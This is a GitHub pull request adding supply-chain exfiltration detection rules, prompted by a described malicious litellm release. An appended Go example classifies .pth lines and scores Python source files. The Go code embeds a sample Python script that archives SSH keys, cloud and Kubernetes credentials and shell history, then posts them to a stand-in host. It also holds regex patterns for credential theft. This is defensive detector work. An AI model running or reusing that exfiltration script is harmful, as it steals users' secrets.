feat: 10 supply-chain exfiltration rules (litellm attack)#38

Merged
garagon merged 1 commit into main from feature/supply-chain-exfil-rules on Mar 24, 2026
Conversation

@garagon (Owner) commented Mar 24, 2026

Summary

10 new detection rules for supply-chain exfiltration attacks, derived from the litellm supply chain compromise (March 24, 2026).

New category: supply-chain-exfil. New file: internal/rules/builtin/supply-chain-exfil.yaml.

The litellm attack

litellm v1.82.7/1.82.8 were published to PyPI with malicious .pth files that:

  1. Harvest SSH keys, cloud credentials, K8s configs, shell history, crypto wallets
  2. Encrypt with hardcoded RSA public key (AES-256-CBC)
  3. POST encrypted tar archive to attacker server
  4. Read all K8s secrets, create privileged pods on every node
  5. Install systemd persistence

Why existing rules didn't catch it

Existing supply-chain rules focus on setup.py execution, download-and-execute, and reverse shells. The litellm attack uses clean Python to read local files and POST via HTTPS - no shell commands, no downloads.

New rules

Rule        Severity   Description
SC-EX-001   CRITICAL   Credential file read in Python (SSH, cloud, wallets)
SC-EX-002   CRITICAL   File encoding for exfiltration (base64, AES, RSA)
SC-EX-003   CRITICAL   Bulk os.environ collection + HTTP send
SC-EX-004   CRITICAL   .pth file with executable content
SC-EX-005   HIGH       Cloud metadata endpoint access in Python
SC-EX-006   CRITICAL   K8s secrets API access / privileged pods
SC-EX-007   CRITICAL   Systemd/cron persistence installation
SC-EX-008   HIGH       Hardcoded cryptographic key material
SC-EX-009   CRITICAL   Archive creation + HTTP POST
SC-EX-010   MEDIUM     .pth file presence (review flag)

187 total rules (was 177). 560 tests, 0 lint issues.

Test plan

  • All 10 SC-EX rule self-tests pass (true positives match, false positives don't)
  • All 187 rule self-tests pass
  • Integration test TestIntegrationBenignSecurityTooling passes (no FPs on security tools)
  • Full make build && make test && make vet && make lint passes
  • 560 tests, 0 lint issues

New category: supply-chain-exfil. Derived from the litellm supply chain
attack (March 24, 2026) where compromised PyPI packages harvested
credentials via .pth files, encrypted with RSA, and exfiltrated via HTTPS.

Rules detect:
- Credential file reads in Python (SSH keys, cloud configs, wallets)
- File content encoding for exfiltration (base64, AES, RSA)
- Bulk os.environ collection with network send
- .pth files with executable content
- Cloud metadata endpoint access in Python
- Kubernetes secrets API access and privileged pod creation
- Systemd/cron persistence installation
- Hardcoded cryptographic key material
- Tar/zip archive creation combined with HTTP POST
- .pth file presence with non-path content

187 total rules (was 177). All 560 tests pass, 0 lint issues.
@garagon garagon merged commit 06c5da4 into main Mar 24, 2026
1 check passed
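As an added example (not code from this PR and not the project's rule engine, whose YAML rule format is not shown on this page), the following Go program implements the two checks the discussion above leans on most: classifying .pth lines by whether CPython's site.py will execute them (the SC-EX-004 / SC-EX-010 distinction) and scoring a Python source file for the credential-read, encode/archive, HTTP-POST co-occurrence that SC-EX-001, SC-EX-002 and SC-EX-009 target. Go is assumed from the repository layout (internal/, make vet); the indicator regexes, severity thresholds and the sample .pth and .py inputs are constructed for illustration and are not the litellm payload.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// PthLine is one classified line of a .pth file. CPython's site.py appends
// ordinary lines to sys.path, skips blanks and "#" comments, and exec()s any
// line beginning with "import " or "import\t". That exec is what lets a
// package run code at every interpreter start-up with no setup.py involved.
type PthLine struct {
	Num  int
	Kind string // "path", "exec", "comment" or "blank"
	Text string
}

// ClassifyPth labels every line of a .pth file using site.py's own rules.
func ClassifyPth(content string) []PthLine {
	var out []PthLine
	for i, raw := range strings.Split(content, "\n") {
		line := strings.TrimSpace(raw)
		kind := "path"
		switch {
		case line == "":
			kind = "blank"
		case strings.HasPrefix(line, "#"):
			kind = "comment"
		case strings.HasPrefix(line, "import ") || strings.HasPrefix(line, "import\t"):
			kind = "exec"
		}
		out = append(out, PthLine{Num: i + 1, Kind: kind, Text: line})
	}
	return out
}

// HasExecutablePth reports whether site.py would execute anything in the file.
func HasExecutablePth(content string) bool {
	for _, l := range ClassifyPth(content) {
		if l.Kind == "exec" {
			return true
		}
	}
	return false
}

// Illustrative indicator groups (assumed patterns, not the project's rules):
// credential paths, encode/encrypt calls, archive creation, outbound HTTP.
var exfilIndicators = []struct {
	Name string
	Re   *regexp.Regexp
}{
	{"cred_read", regexp.MustCompile(`\.ssh/|id_rsa|id_ed25519|\.aws/credentials|\.kube/config|\.bash_history|\.zsh_history|wallet\.dat`)},
	{"encode", regexp.MustCompile(`base64\.b64encode|AES\.new|PKCS1_OAEP|RSA\.import_key|Fernet\(`)},
	{"archive", regexp.MustCompile(`tarfile\.open|zipfile\.ZipFile|shutil\.make_archive`)},
	{"http_send", regexp.MustCompile(`requests\.post|urlopen\(|HTTPSConnection\(`)},
}

// ExfilSeverity scores one Python source file. Credential reads plus an
// outbound send is the litellm shape (CRITICAL); encoding or archiving plus a
// send is HIGH; a lone indicator is LOW because base64 or requests.post on
// their own appear in plenty of benign code (the FP case the PR's self-tests
// guard against).
func ExfilSeverity(src string) (string, []string) {
	hit := map[string]bool{}
	var names []string
	for _, ind := range exfilIndicators {
		if ind.Re.MatchString(src) {
			hit[ind.Name] = true
			names = append(names, ind.Name)
		}
	}
	switch {
	case hit["cred_read"] && hit["http_send"]:
		return "CRITICAL", names
	case hit["http_send"] && (hit["encode"] || hit["archive"]):
		return "HIGH", names
	case len(names) > 0:
		return "LOW", names
	}
	return "NONE", names
}

// Constructed samples; none of this is the real litellm payload.
const (
	BenignPth     = "/usr/lib/python3/dist-packages/vendored\n"
	SuspiciousPth = "/usr/lib/python3/dist-packages/vendored\nimport os, sys; sys.path.insert(0, os.path.join(os.path.dirname(__file__), \"_hook\"))\n"
	BenignPy      = "import requests\nr = requests.get(\"https://pypi.org/simple/\")\nprint(r.status_code)\n"
	ExfilPy       = `import os, tarfile, base64, requests
home = os.path.expanduser("~")
with tarfile.open("/tmp/c.tar", "w") as t:
    for p in [".ssh/id_rsa", ".aws/credentials", ".kube/config", ".bash_history"]:
        t.add(os.path.join(home, p))
blob = base64.b64encode(open("/tmp/c.tar", "rb").read())
requests.post("https://example.invalid/upload", data=blob)
`
)

func main() {
	for _, l := range ClassifyPth(SuspiciousPth) {
		fmt.Printf("pth line %d %-7s %s\n", l.Num, l.Kind, l.Text)
	}
	for _, s := range []string{BenignPy, ExfilPy} {
		sev, hits := ExfilSeverity(s)
		fmt.Printf("%-8s %v\n", sev, hits)
	}
}
```

The .pth check is exact because it mirrors site.py's own dispatch, so a plain path line can never be flagged; the source-file scorer is deliberately coarse (co-occurrence in one file, not data flow), which is why the severity ladder demands two classes of indicator before it calls anything CRITICAL.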